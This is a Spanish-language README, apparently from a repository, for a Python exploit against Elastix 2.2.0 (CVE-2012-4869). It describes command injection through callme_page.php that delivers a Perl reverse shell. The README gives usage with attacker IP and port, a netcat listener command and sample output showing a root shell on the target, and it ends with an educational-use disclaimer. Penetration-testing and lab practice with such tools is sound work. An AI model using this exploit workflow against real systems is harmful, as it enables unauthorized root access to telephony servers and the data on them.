
Script de exploit en Python para la vulnerabilidad LFI de Elastix 2.2.0 (CVE-2012-4869) que permite la ejecución remota de código mediante la inyección de un payload de reverse shell en Perl.
Este script explota una vulnerabilidad de Inclusión de Archivos Locales (LFI) en Elastix 2.2.0, permitiendo la ejecución remota de código (RCE) mediante la inyección de comandos a través del endpoint callme_page.php. El exploit está basado en CVE-2012-4869.
requestsInstale las dependencias usando:
pip install requests
python exploit.py <URL> --LHOST <TU_IP> --LPORT <TU_PUERTO>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
Antes de ejecutar el exploit, inicie un listener de Netcat en su máquina:
nc -lvnp 9001
[*] Ejecutando Exploit LFI de Elastix 2.2.0 - CVE-2012-4869
[*] Objetivo: https://10.129.229.183
[*] Escuchando en 10.10.14.23:9001
[+] Exploit enviado exitosamente, esperando reverse shell...
[+] Conexión desde 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
Este exploit es únicamente para fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado es ilegal. El autor no se hace responsable del mal uso de esta herramienta.